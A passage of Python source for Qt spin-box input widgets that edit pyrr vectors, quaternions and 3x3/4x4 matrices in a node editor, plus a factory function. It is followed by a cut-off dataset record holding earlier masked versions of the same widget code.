            sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
            sb.setSingleStep(FLOAT_SINGLE_STEP)
            sb.setDecimals(FLOAT_DECIMALS)

    def _emitWithComponent(self, axis, val):
        # Rebuild the vector, overwrite one axis and notify the pin.
        # asDataTypeClass() is virtual, so subclasses (QuatInputWidget)
        # emit their own type here.
        v = self.asDataTypeClass()
        setattr(v, axis, val)
        self.dataSetCallback(v)

    def _onDataChangedX(self, val):
        self._emitWithComponent('x', val)

    def _onDataChangedY(self, val):
        self._emitWithComponent('y', val)

    def _onDataChangedZ(self, val):
        self._emitWithComponent('z', val)

    def _onDataChangedW(self, val):
        self._emitWithComponent('w', val)

    def setWidgetValue(self, val):
        self.dsbX.setValue(val.x)
        self.dsbY.setValue(val.y)
        self.dsbZ.setValue(val.z)
        self.dsbW.setValue(val.w)
class QuatInputWidget(FloatVector4InputWidget):
    """Quaternion input widget; reuses the four-component vector editor."""

    def __init__(self, **kwds):
        super(QuatInputWidget, self).__init__(**kwds)

    def asDataTypeClass(self):
        # Same four spin boxes as the parent, interpreted as x, y, z, w of
        # a quaternion instead of a Vector4.
        components = [self.dsbX.value(), self.dsbY.value(),
                      self.dsbZ.value(), self.dsbW.value()]
        return pyrr.Quaternion(components)
class Matrix33InputWidget(InputWidgetRaw, Matrix33InputWidget_ui.Ui_Form):
    """Matrix33 data input widget.

    Shows one double spin box per component of a 3x3 matrix; editing any
    component rebuilds the full ``pyrr.Matrix33`` and hands it to
    ``dataSetCallback``.
    """

    # Row-major component names; the designer .ui file provides a matching
    # ``dsb<name>`` spin box for each.
    _COMPONENTS = ('m11', 'm12', 'm13',
                   'm21', 'm22', 'm23',
                   'm31', 'm32', 'm33')

    def __init__(self, parent=None, **kwds):
        super(Matrix33InputWidget, self).__init__(parent=parent, **kwds)
        self.setupUi(self)
        self._configSpinBoxes()
        # Wire every spin box to its per-component slot. The slots are kept
        # as named public methods for backward compatibility.
        for name in self._COMPONENTS:
            getattr(self, 'dsb' + name).valueChanged.connect(
                getattr(self, name + 'Changed'))
        self.pbReset.clicked.connect(self.onResetValue)

    def asDataTypeClass(self):
        """Return the current widget state as a ``pyrr.Matrix33``."""
        rows = [[getattr(self, 'dsbm%d%d' % (r, c)).value()
                 for c in (1, 2, 3)]
                for r in (1, 2, 3)]
        return pyrr.Matrix33(rows)

    def _configSpinBoxes(self):
        # Apply the shared float range/step/precision to all nine boxes.
        for name in self._COMPONENTS:
            sb = getattr(self, 'dsb' + name)
            sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
            sb.setSingleStep(FLOAT_SINGLE_STEP)
            sb.setDecimals(FLOAT_DECIMALS)

    def _componentChanged(self, name, val):
        # Rebuild the matrix, overwrite the edited component and notify.
        m = self.asDataTypeClass()
        setattr(m, name, val)
        self.dataSetCallback(m)

    # --- per-component slots (public names preserved for existing callers) ---

    def m11Changed(self, val):
        self._componentChanged('m11', val)

    def m12Changed(self, val):
        self._componentChanged('m12', val)

    def m13Changed(self, val):
        self._componentChanged('m13', val)

    def m21Changed(self, val):
        self._componentChanged('m21', val)

    def m22Changed(self, val):
        self._componentChanged('m22', val)

    def m23Changed(self, val):
        self._componentChanged('m23', val)

    def m31Changed(self, val):
        self._componentChanged('m31', val)

    def m32Changed(self, val):
        self._componentChanged('m32', val)

    def m33Changed(self, val):
        self._componentChanged('m33', val)

    def setWidgetValue(self, val):
        """Push ``val`` (a ``pyrr.Matrix33``) component-wise into the boxes."""
        for name in self._COMPONENTS:
            getattr(self, 'dsb' + name).setValue(getattr(val, name))
class Matrix44InputWidget(InputWidgetRaw, Matrix44InputWidget_ui.Ui_Form):
    """Matrix44 data input widget.

    Shows one double spin box per component of a 4x4 matrix; editing any
    component rebuilds the full ``pyrr.Matrix44`` and hands it to
    ``dataSetCallback``.
    """

    # Row-major component names; the designer .ui file provides a matching
    # ``dsb<name>`` spin box for each.
    _COMPONENTS = ('m11', 'm12', 'm13', 'm14',
                   'm21', 'm22', 'm23', 'm24',
                   'm31', 'm32', 'm33', 'm34',
                   'm41', 'm42', 'm43', 'm44')

    def __init__(self, parent=None, **kwds):
        super(Matrix44InputWidget, self).__init__(parent=parent, **kwds)
        self.setupUi(self)
        self._configSpinBoxes()
        # Wire every spin box to its per-component slot. The slots are kept
        # as named public methods for backward compatibility.
        for name in self._COMPONENTS:
            getattr(self, 'dsb' + name).valueChanged.connect(
                getattr(self, name + 'Changed'))
        self.pbReset.clicked.connect(self.onResetValue)

    def asDataTypeClass(self):
        """Return the current widget state as a ``pyrr.Matrix44``."""
        rows = [[getattr(self, 'dsbm%d%d' % (r, c)).value()
                 for c in (1, 2, 3, 4)]
                for r in (1, 2, 3, 4)]
        return pyrr.Matrix44(rows)

    def _configSpinBoxes(self):
        # Apply the shared float range/step/precision to all sixteen boxes.
        for name in self._COMPONENTS:
            sb = getattr(self, 'dsb' + name)
            sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
            sb.setSingleStep(FLOAT_SINGLE_STEP)
            sb.setDecimals(FLOAT_DECIMALS)

    def _componentChanged(self, name, val):
        # Rebuild the matrix, overwrite the edited component and notify.
        m = self.asDataTypeClass()
        setattr(m, name, val)
        self.dataSetCallback(m)

    # --- per-component slots (public names preserved for existing callers) ---

    def m11Changed(self, val):
        self._componentChanged('m11', val)

    def m12Changed(self, val):
        self._componentChanged('m12', val)

    def m13Changed(self, val):
        self._componentChanged('m13', val)

    def m14Changed(self, val):
        self._componentChanged('m14', val)

    def m21Changed(self, val):
        self._componentChanged('m21', val)

    def m22Changed(self, val):
        self._componentChanged('m22', val)

    def m23Changed(self, val):
        self._componentChanged('m23', val)

    def m24Changed(self, val):
        self._componentChanged('m24', val)

    def m31Changed(self, val):
        self._componentChanged('m31', val)

    def m32Changed(self, val):
        self._componentChanged('m32', val)

    def m33Changed(self, val):
        self._componentChanged('m33', val)

    def m34Changed(self, val):
        self._componentChanged('m34', val)

    def m41Changed(self, val):
        self._componentChanged('m41', val)

    def m42Changed(self, val):
        self._componentChanged('m42', val)

    def m43Changed(self, val):
        self._componentChanged('m43', val)

    def m44Changed(self, val):
        self._componentChanged('m44', val)

    def setWidgetValue(self, val):
        """Push ``val`` (a ``pyrr.Matrix44``) component-wise into the boxes."""
        for name in self._COMPONENTS:
            getattr(self, 'dsb' + name).setValue(getattr(val, name))
def getInputWidget(dataType, dataSetter, defaultValue, userStructClass):
    """
    Factory method: build the input widget matching *dataType*.

    Exec and Enum types need special constructor arguments and are handled
    first; every other known type maps one-to-one onto a widget class.
    Unknown types fall back to a read-only NoneInputWidget.
    """
    if dataType == DataTypes.Exec:
        # Exec pins carry no value, so the default is always None.
        return ExecInputWidget(dataSetCallback=dataSetter, defaultValue=None)
    if dataType == DataTypes.Enum:
        return EnumInputWidget(dataSetCallback=dataSetter,
                               defaultValue=defaultValue,
                               userStructClass=userStructClass)
    widgetByType = {
        DataTypes.Float: FloatInputWidget,
        DataTypes.Int: IntInputWidget,
        DataTypes.String: StringInputWidget,
        DataTypes.Bool: BoolInputWidget,
        DataTypes.FloatVector3: FloatVector3InputWidget,
        DataTypes.FloatVector4: FloatVector4InputWidget,
        DataTypes.Quaternion: QuatInputWidget,
        DataTypes.Matrix33: Matrix33InputWidget,
        DataTypes.Matrix44: Matrix44InputWidget,
    }
    widgetClass = widgetByType.get(dataType, NoneInputWidget)
    return widgetClass(dataSetCallback=dataSetter, defaultValue=defaultValue)
|
flexible
|
{
"blob_id": "023dc23a5e649c2fbbb45ff577dffa3b5d2aac64",
"index": 7904,
"step-1": "<mask token>\n\n\nclass FloatVector3InputWidget(InputWidgetRaw, FloatVector3InputWidget_ui.\n Ui_Form):\n <mask token>\n\n def __init__(self, **kwds):\n super(FloatVector3InputWidget, self).__init__(**kwds)\n self.setupUi(self)\n self._configSpinBoxes()\n self.dsbX.valueChanged.connect(self._onDataChangedX)\n self.dsbY.valueChanged.connect(self._onDataChangedY)\n self.dsbZ.valueChanged.connect(self._onDataChangedZ)\n self.pbReset.clicked.connect(self.onResetValue)\n\n def asDataTypeClass(self):\n return pyrr.Vector3([self.dsbX.value(), self.dsbY.value(), self.\n dsbZ.value()])\n\n def _configSpinBoxes(self):\n self.dsbX.setDecimals(FLOAT_DECIMALS)\n self.dsbY.setDecimals(FLOAT_DECIMALS)\n self.dsbZ.setDecimals(FLOAT_DECIMALS)\n self.dsbX.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbY.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbZ.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbX.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbY.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbZ.setSingleStep(FLOAT_SINGLE_STEP)\n\n def _onDataChangedX(self, val):\n v = self.asDataTypeClass()\n v.x = val\n self.dataSetCallback(v)\n\n def _onDataChangedY(self, val):\n v = self.asDataTypeClass()\n v.y = val\n self.dataSetCallback(v)\n\n def _onDataChangedZ(self, val):\n v = self.asDataTypeClass()\n v.z = val\n self.dataSetCallback(v)\n\n def setWidgetValue(self, val):\n self.dsbX.setValue(val.x)\n self.dsbY.setValue(val.y)\n self.dsbZ.setValue(val.z)\n\n\nclass FloatVector4InputWidget(InputWidgetRaw, FloatVector4InputWidget_ui.\n Ui_Form):\n \"\"\"Vector4 data input widget\"\"\"\n\n def __init__(self, **kwds):\n super(FloatVector4InputWidget, self).__init__(**kwds)\n self.setupUi(self)\n self._configSpinBoxes()\n self.dsbX.valueChanged.connect(self._onDataChangedX)\n self.dsbY.valueChanged.connect(self._onDataChangedY)\n self.dsbZ.valueChanged.connect(self._onDataChangedZ)\n self.dsbW.valueChanged.connect(self._onDataChangedW)\n 
self.pbReset.clicked.connect(self.onResetValue)\n\n def asDataTypeClass(self):\n return pyrr.Vector4([self.dsbX.value(), self.dsbY.value(), self.\n dsbZ.value(), self.dsbW.value()])\n\n def _configSpinBoxes(self):\n self.dsbX.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbY.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbZ.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbW.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbX.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbY.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbZ.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbW.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbX.setDecimals(FLOAT_DECIMALS)\n self.dsbY.setDecimals(FLOAT_DECIMALS)\n self.dsbZ.setDecimals(FLOAT_DECIMALS)\n self.dsbW.setDecimals(FLOAT_DECIMALS)\n\n def _onDataChangedX(self, val):\n v = self.asDataTypeClass()\n v.x = val\n self.dataSetCallback(v)\n\n def _onDataChangedY(self, val):\n v = self.asDataTypeClass()\n v.y = val\n self.dataSetCallback(v)\n\n def _onDataChangedZ(self, val):\n v = self.asDataTypeClass()\n v.z = val\n self.dataSetCallback(v)\n\n def _onDataChangedW(self, val):\n v = self.asDataTypeClass()\n v.w = val\n self.dataSetCallback(v)\n\n def setWidgetValue(self, val):\n self.dsbX.setValue(val.x)\n self.dsbY.setValue(val.y)\n self.dsbZ.setValue(val.z)\n self.dsbW.setValue(val.w)\n\n\nclass QuatInputWidget(FloatVector4InputWidget):\n \"\"\"Quaternion data input widget\"\"\"\n\n def __init__(self, **kwds):\n super(QuatInputWidget, self).__init__(**kwds)\n\n def asDataTypeClass(self):\n return pyrr.Quaternion([self.dsbX.value(), self.dsbY.value(), self.\n dsbZ.value(), self.dsbW.value()])\n\n\nclass Matrix33InputWidget(InputWidgetRaw, Matrix33InputWidget_ui.Ui_Form):\n \"\"\"Matrix33 data input widget\"\"\"\n\n def __init__(self, parent=None, **kwds):\n super(Matrix33InputWidget, self).__init__(parent=parent, **kwds)\n self.setupUi(self)\n self._configSpinBoxes()\n self.dsbm11.valueChanged.connect(self.m11Changed)\n 
self.dsbm12.valueChanged.connect(self.m12Changed)\n self.dsbm13.valueChanged.connect(self.m13Changed)\n self.dsbm21.valueChanged.connect(self.m21Changed)\n self.dsbm22.valueChanged.connect(self.m22Changed)\n self.dsbm23.valueChanged.connect(self.m23Changed)\n self.dsbm31.valueChanged.connect(self.m31Changed)\n self.dsbm32.valueChanged.connect(self.m32Changed)\n self.dsbm33.valueChanged.connect(self.m33Changed)\n self.pbReset.clicked.connect(self.onResetValue)\n\n def asDataTypeClass(self):\n return pyrr.Matrix33([[self.dsbm11.value(), self.dsbm12.value(),\n self.dsbm13.value()], [self.dsbm21.value(), self.dsbm22.value(),\n self.dsbm23.value()], [self.dsbm31.value(), self.dsbm32.value(),\n self.dsbm33.value()]])\n\n def _configSpinBoxes(self):\n ls = [self.dsbm11, self.dsbm12, self.dsbm13, self.dsbm21, self.\n dsbm22, self.dsbm23, self.dsbm31, self.dsbm32, self.dsbm33]\n for sb in ls:\n sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n sb.setSingleStep(FLOAT_SINGLE_STEP)\n sb.setDecimals(FLOAT_DECIMALS)\n\n def m11Changed(self, val):\n m = self.asDataTypeClass()\n m.m11 = val\n self.dataSetCallback(m)\n\n def m12Changed(self, val):\n m = self.asDataTypeClass()\n m.m12 = val\n self.dataSetCallback(m)\n\n def m13Changed(self, val):\n m = self.asDataTypeClass()\n m.m13 = val\n self.dataSetCallback(m)\n\n def m21Changed(self, val):\n m = self.asDataTypeClass()\n m.m21 = val\n self.dataSetCallback(m)\n\n def m22Changed(self, val):\n m = self.asDataTypeClass()\n m.m22 = val\n self.dataSetCallback(m)\n\n def m23Changed(self, val):\n m = self.asDataTypeClass()\n m.m23 = val\n self.dataSetCallback(m)\n\n def m31Changed(self, val):\n m = self.asDataTypeClass()\n m.m31 = val\n self.dataSetCallback(m)\n\n def m32Changed(self, val):\n m = self.asDataTypeClass()\n m.m32 = val\n self.dataSetCallback(m)\n\n def m33Changed(self, val):\n m = self.asDataTypeClass()\n m.m33 = val\n self.dataSetCallback(m)\n\n def setWidgetValue(self, val):\n self.dsbm11.setValue(val.m11)\n 
self.dsbm12.setValue(val.m12)\n self.dsbm13.setValue(val.m13)\n self.dsbm21.setValue(val.m21)\n self.dsbm22.setValue(val.m22)\n self.dsbm23.setValue(val.m23)\n self.dsbm31.setValue(val.m31)\n self.dsbm32.setValue(val.m32)\n self.dsbm33.setValue(val.m33)\n\n\nclass Matrix44InputWidget(InputWidgetRaw, Matrix44InputWidget_ui.Ui_Form):\n \"\"\"Matrix44 data input widget\"\"\"\n\n def __init__(self, parent=None, **kwds):\n super(Matrix44InputWidget, self).__init__(parent=parent, **kwds)\n self.setupUi(self)\n self._configSpinBoxes()\n self.dsbm11.valueChanged.connect(self.m11Changed)\n self.dsbm12.valueChanged.connect(self.m12Changed)\n self.dsbm13.valueChanged.connect(self.m13Changed)\n self.dsbm14.valueChanged.connect(self.m14Changed)\n self.dsbm21.valueChanged.connect(self.m21Changed)\n self.dsbm22.valueChanged.connect(self.m22Changed)\n self.dsbm23.valueChanged.connect(self.m23Changed)\n self.dsbm24.valueChanged.connect(self.m24Changed)\n self.dsbm31.valueChanged.connect(self.m31Changed)\n self.dsbm32.valueChanged.connect(self.m32Changed)\n self.dsbm33.valueChanged.connect(self.m33Changed)\n self.dsbm34.valueChanged.connect(self.m34Changed)\n self.dsbm41.valueChanged.connect(self.m41Changed)\n self.dsbm42.valueChanged.connect(self.m42Changed)\n self.dsbm43.valueChanged.connect(self.m43Changed)\n self.dsbm44.valueChanged.connect(self.m44Changed)\n self.pbReset.clicked.connect(self.onResetValue)\n\n def asDataTypeClass(self):\n return pyrr.Matrix44([[self.dsbm11.value(), self.dsbm12.value(),\n self.dsbm13.value(), self.dsbm14.value()], [self.dsbm21.value(),\n self.dsbm22.value(), self.dsbm23.value(), self.dsbm24.value()],\n [self.dsbm31.value(), self.dsbm32.value(), self.dsbm33.value(),\n self.dsbm34.value()], [self.dsbm41.value(), self.dsbm42.value(),\n self.dsbm43.value(), self.dsbm44.value()]])\n\n def _configSpinBoxes(self):\n ls = [self.dsbm11, self.dsbm12, self.dsbm13, self.dsbm14, self.\n dsbm21, self.dsbm22, self.dsbm23, self.dsbm24, self.dsbm31,\n 
self.dsbm32, self.dsbm33, self.dsbm34, self.dsbm41, self.dsbm42,\n self.dsbm43, self.dsbm44]\n for sb in ls:\n sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n sb.setSingleStep(FLOAT_SINGLE_STEP)\n sb.setDecimals(FLOAT_DECIMALS)\n\n def m11Changed(self, val):\n m = self.asDataTypeClass()\n m.m11 = val\n self.dataSetCallback(m)\n\n def m12Changed(self, val):\n m = self.asDataTypeClass()\n m.m12 = val\n self.dataSetCallback(m)\n\n def m13Changed(self, val):\n m = self.asDataTypeClass()\n m.m13 = val\n self.dataSetCallback(m)\n\n def m14Changed(self, val):\n m = self.asDataTypeClass()\n m.m14 = val\n self.dataSetCallback(m)\n\n def m21Changed(self, val):\n m = self.asDataTypeClass()\n m.m21 = val\n self.dataSetCallback(m)\n\n def m22Changed(self, val):\n m = self.asDataTypeClass()\n m.m22 = val\n self.dataSetCallback(m)\n\n def m23Changed(self, val):\n m = self.asDataTypeClass()\n m.m23 = val\n self.dataSetCallback(m)\n\n def m24Changed(self, val):\n m = self.asDataTypeClass()\n m.m24 = val\n self.dataSetCallback(m)\n\n def m31Changed(self, val):\n m = self.asDataTypeClass()\n m.m31 = val\n self.dataSetCallback(m)\n\n def m32Changed(self, val):\n m = self.asDataTypeClass()\n m.m32 = val\n self.dataSetCallback(m)\n\n def m33Changed(self, val):\n m = self.asDataTypeClass()\n m.m33 = val\n self.dataSetCallback(m)\n\n def m34Changed(self, val):\n m = self.asDataTypeClass()\n m.m34 = val\n self.dataSetCallback(m)\n\n def m41Changed(self, val):\n m = self.asDataTypeClass()\n m.m41 = val\n self.dataSetCallback(m)\n\n def m42Changed(self, val):\n m = self.asDataTypeClass()\n m.m42 = val\n self.dataSetCallback(m)\n\n def m43Changed(self, val):\n m = self.asDataTypeClass()\n m.m43 = val\n self.dataSetCallback(m)\n\n def m44Changed(self, val):\n m = self.asDataTypeClass()\n m.m44 = val\n self.dataSetCallback(m)\n\n def setWidgetValue(self, val):\n self.dsbm11.setValue(val.m11)\n self.dsbm12.setValue(val.m12)\n self.dsbm13.setValue(val.m13)\n self.dsbm14.setValue(val.m14)\n 
self.dsbm21.setValue(val.m21)\n self.dsbm22.setValue(val.m22)\n self.dsbm23.setValue(val.m23)\n self.dsbm24.setValue(val.m24)\n self.dsbm31.setValue(val.m31)\n self.dsbm32.setValue(val.m32)\n self.dsbm33.setValue(val.m33)\n self.dsbm34.setValue(val.m34)\n self.dsbm41.setValue(val.m41)\n self.dsbm42.setValue(val.m42)\n self.dsbm43.setValue(val.m43)\n self.dsbm44.setValue(val.m44)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass FloatVector3InputWidget(InputWidgetRaw, FloatVector3InputWidget_ui.\n Ui_Form):\n \"\"\"Vector3 data input widget\"\"\"\n\n def __init__(self, **kwds):\n super(FloatVector3InputWidget, self).__init__(**kwds)\n self.setupUi(self)\n self._configSpinBoxes()\n self.dsbX.valueChanged.connect(self._onDataChangedX)\n self.dsbY.valueChanged.connect(self._onDataChangedY)\n self.dsbZ.valueChanged.connect(self._onDataChangedZ)\n self.pbReset.clicked.connect(self.onResetValue)\n\n def asDataTypeClass(self):\n return pyrr.Vector3([self.dsbX.value(), self.dsbY.value(), self.\n dsbZ.value()])\n\n def _configSpinBoxes(self):\n self.dsbX.setDecimals(FLOAT_DECIMALS)\n self.dsbY.setDecimals(FLOAT_DECIMALS)\n self.dsbZ.setDecimals(FLOAT_DECIMALS)\n self.dsbX.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbY.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbZ.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbX.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbY.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbZ.setSingleStep(FLOAT_SINGLE_STEP)\n\n def _onDataChangedX(self, val):\n v = self.asDataTypeClass()\n v.x = val\n self.dataSetCallback(v)\n\n def _onDataChangedY(self, val):\n v = self.asDataTypeClass()\n v.y = val\n self.dataSetCallback(v)\n\n def _onDataChangedZ(self, val):\n v = self.asDataTypeClass()\n v.z = val\n self.dataSetCallback(v)\n\n def setWidgetValue(self, val):\n self.dsbX.setValue(val.x)\n self.dsbY.setValue(val.y)\n self.dsbZ.setValue(val.z)\n\n\nclass FloatVector4InputWidget(InputWidgetRaw, FloatVector4InputWidget_ui.\n Ui_Form):\n \"\"\"Vector4 data input widget\"\"\"\n\n def __init__(self, **kwds):\n super(FloatVector4InputWidget, self).__init__(**kwds)\n self.setupUi(self)\n self._configSpinBoxes()\n self.dsbX.valueChanged.connect(self._onDataChangedX)\n self.dsbY.valueChanged.connect(self._onDataChangedY)\n self.dsbZ.valueChanged.connect(self._onDataChangedZ)\n self.dsbW.valueChanged.connect(self._onDataChangedW)\n 
self.pbReset.clicked.connect(self.onResetValue)\n\n def asDataTypeClass(self):\n return pyrr.Vector4([self.dsbX.value(), self.dsbY.value(), self.\n dsbZ.value(), self.dsbW.value()])\n\n def _configSpinBoxes(self):\n self.dsbX.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbY.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbZ.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbW.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbX.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbY.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbZ.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbW.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbX.setDecimals(FLOAT_DECIMALS)\n self.dsbY.setDecimals(FLOAT_DECIMALS)\n self.dsbZ.setDecimals(FLOAT_DECIMALS)\n self.dsbW.setDecimals(FLOAT_DECIMALS)\n\n def _onDataChangedX(self, val):\n v = self.asDataTypeClass()\n v.x = val\n self.dataSetCallback(v)\n\n def _onDataChangedY(self, val):\n v = self.asDataTypeClass()\n v.y = val\n self.dataSetCallback(v)\n\n def _onDataChangedZ(self, val):\n v = self.asDataTypeClass()\n v.z = val\n self.dataSetCallback(v)\n\n def _onDataChangedW(self, val):\n v = self.asDataTypeClass()\n v.w = val\n self.dataSetCallback(v)\n\n def setWidgetValue(self, val):\n self.dsbX.setValue(val.x)\n self.dsbY.setValue(val.y)\n self.dsbZ.setValue(val.z)\n self.dsbW.setValue(val.w)\n\n\nclass QuatInputWidget(FloatVector4InputWidget):\n \"\"\"Quaternion data input widget\"\"\"\n\n def __init__(self, **kwds):\n super(QuatInputWidget, self).__init__(**kwds)\n\n def asDataTypeClass(self):\n return pyrr.Quaternion([self.dsbX.value(), self.dsbY.value(), self.\n dsbZ.value(), self.dsbW.value()])\n\n\nclass Matrix33InputWidget(InputWidgetRaw, Matrix33InputWidget_ui.Ui_Form):\n \"\"\"Matrix33 data input widget\"\"\"\n\n def __init__(self, parent=None, **kwds):\n super(Matrix33InputWidget, self).__init__(parent=parent, **kwds)\n self.setupUi(self)\n self._configSpinBoxes()\n self.dsbm11.valueChanged.connect(self.m11Changed)\n 
self.dsbm12.valueChanged.connect(self.m12Changed)\n self.dsbm13.valueChanged.connect(self.m13Changed)\n self.dsbm21.valueChanged.connect(self.m21Changed)\n self.dsbm22.valueChanged.connect(self.m22Changed)\n self.dsbm23.valueChanged.connect(self.m23Changed)\n self.dsbm31.valueChanged.connect(self.m31Changed)\n self.dsbm32.valueChanged.connect(self.m32Changed)\n self.dsbm33.valueChanged.connect(self.m33Changed)\n self.pbReset.clicked.connect(self.onResetValue)\n\n def asDataTypeClass(self):\n return pyrr.Matrix33([[self.dsbm11.value(), self.dsbm12.value(),\n self.dsbm13.value()], [self.dsbm21.value(), self.dsbm22.value(),\n self.dsbm23.value()], [self.dsbm31.value(), self.dsbm32.value(),\n self.dsbm33.value()]])\n\n def _configSpinBoxes(self):\n ls = [self.dsbm11, self.dsbm12, self.dsbm13, self.dsbm21, self.\n dsbm22, self.dsbm23, self.dsbm31, self.dsbm32, self.dsbm33]\n for sb in ls:\n sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n sb.setSingleStep(FLOAT_SINGLE_STEP)\n sb.setDecimals(FLOAT_DECIMALS)\n\n def m11Changed(self, val):\n m = self.asDataTypeClass()\n m.m11 = val\n self.dataSetCallback(m)\n\n def m12Changed(self, val):\n m = self.asDataTypeClass()\n m.m12 = val\n self.dataSetCallback(m)\n\n def m13Changed(self, val):\n m = self.asDataTypeClass()\n m.m13 = val\n self.dataSetCallback(m)\n\n def m21Changed(self, val):\n m = self.asDataTypeClass()\n m.m21 = val\n self.dataSetCallback(m)\n\n def m22Changed(self, val):\n m = self.asDataTypeClass()\n m.m22 = val\n self.dataSetCallback(m)\n\n def m23Changed(self, val):\n m = self.asDataTypeClass()\n m.m23 = val\n self.dataSetCallback(m)\n\n def m31Changed(self, val):\n m = self.asDataTypeClass()\n m.m31 = val\n self.dataSetCallback(m)\n\n def m32Changed(self, val):\n m = self.asDataTypeClass()\n m.m32 = val\n self.dataSetCallback(m)\n\n def m33Changed(self, val):\n m = self.asDataTypeClass()\n m.m33 = val\n self.dataSetCallback(m)\n\n def setWidgetValue(self, val):\n self.dsbm11.setValue(val.m11)\n 
self.dsbm12.setValue(val.m12)\n self.dsbm13.setValue(val.m13)\n self.dsbm21.setValue(val.m21)\n self.dsbm22.setValue(val.m22)\n self.dsbm23.setValue(val.m23)\n self.dsbm31.setValue(val.m31)\n self.dsbm32.setValue(val.m32)\n self.dsbm33.setValue(val.m33)\n\n\nclass Matrix44InputWidget(InputWidgetRaw, Matrix44InputWidget_ui.Ui_Form):\n \"\"\"Matrix44 data input widget\"\"\"\n\n def __init__(self, parent=None, **kwds):\n super(Matrix44InputWidget, self).__init__(parent=parent, **kwds)\n self.setupUi(self)\n self._configSpinBoxes()\n self.dsbm11.valueChanged.connect(self.m11Changed)\n self.dsbm12.valueChanged.connect(self.m12Changed)\n self.dsbm13.valueChanged.connect(self.m13Changed)\n self.dsbm14.valueChanged.connect(self.m14Changed)\n self.dsbm21.valueChanged.connect(self.m21Changed)\n self.dsbm22.valueChanged.connect(self.m22Changed)\n self.dsbm23.valueChanged.connect(self.m23Changed)\n self.dsbm24.valueChanged.connect(self.m24Changed)\n self.dsbm31.valueChanged.connect(self.m31Changed)\n self.dsbm32.valueChanged.connect(self.m32Changed)\n self.dsbm33.valueChanged.connect(self.m33Changed)\n self.dsbm34.valueChanged.connect(self.m34Changed)\n self.dsbm41.valueChanged.connect(self.m41Changed)\n self.dsbm42.valueChanged.connect(self.m42Changed)\n self.dsbm43.valueChanged.connect(self.m43Changed)\n self.dsbm44.valueChanged.connect(self.m44Changed)\n self.pbReset.clicked.connect(self.onResetValue)\n\n def asDataTypeClass(self):\n return pyrr.Matrix44([[self.dsbm11.value(), self.dsbm12.value(),\n self.dsbm13.value(), self.dsbm14.value()], [self.dsbm21.value(),\n self.dsbm22.value(), self.dsbm23.value(), self.dsbm24.value()],\n [self.dsbm31.value(), self.dsbm32.value(), self.dsbm33.value(),\n self.dsbm34.value()], [self.dsbm41.value(), self.dsbm42.value(),\n self.dsbm43.value(), self.dsbm44.value()]])\n\n def _configSpinBoxes(self):\n ls = [self.dsbm11, self.dsbm12, self.dsbm13, self.dsbm14, self.\n dsbm21, self.dsbm22, self.dsbm23, self.dsbm24, self.dsbm31,\n 
self.dsbm32, self.dsbm33, self.dsbm34, self.dsbm41, self.dsbm42,\n self.dsbm43, self.dsbm44]\n for sb in ls:\n sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n sb.setSingleStep(FLOAT_SINGLE_STEP)\n sb.setDecimals(FLOAT_DECIMALS)\n\n def m11Changed(self, val):\n m = self.asDataTypeClass()\n m.m11 = val\n self.dataSetCallback(m)\n\n def m12Changed(self, val):\n m = self.asDataTypeClass()\n m.m12 = val\n self.dataSetCallback(m)\n\n def m13Changed(self, val):\n m = self.asDataTypeClass()\n m.m13 = val\n self.dataSetCallback(m)\n\n def m14Changed(self, val):\n m = self.asDataTypeClass()\n m.m14 = val\n self.dataSetCallback(m)\n\n def m21Changed(self, val):\n m = self.asDataTypeClass()\n m.m21 = val\n self.dataSetCallback(m)\n\n def m22Changed(self, val):\n m = self.asDataTypeClass()\n m.m22 = val\n self.dataSetCallback(m)\n\n def m23Changed(self, val):\n m = self.asDataTypeClass()\n m.m23 = val\n self.dataSetCallback(m)\n\n def m24Changed(self, val):\n m = self.asDataTypeClass()\n m.m24 = val\n self.dataSetCallback(m)\n\n def m31Changed(self, val):\n m = self.asDataTypeClass()\n m.m31 = val\n self.dataSetCallback(m)\n\n def m32Changed(self, val):\n m = self.asDataTypeClass()\n m.m32 = val\n self.dataSetCallback(m)\n\n def m33Changed(self, val):\n m = self.asDataTypeClass()\n m.m33 = val\n self.dataSetCallback(m)\n\n def m34Changed(self, val):\n m = self.asDataTypeClass()\n m.m34 = val\n self.dataSetCallback(m)\n\n def m41Changed(self, val):\n m = self.asDataTypeClass()\n m.m41 = val\n self.dataSetCallback(m)\n\n def 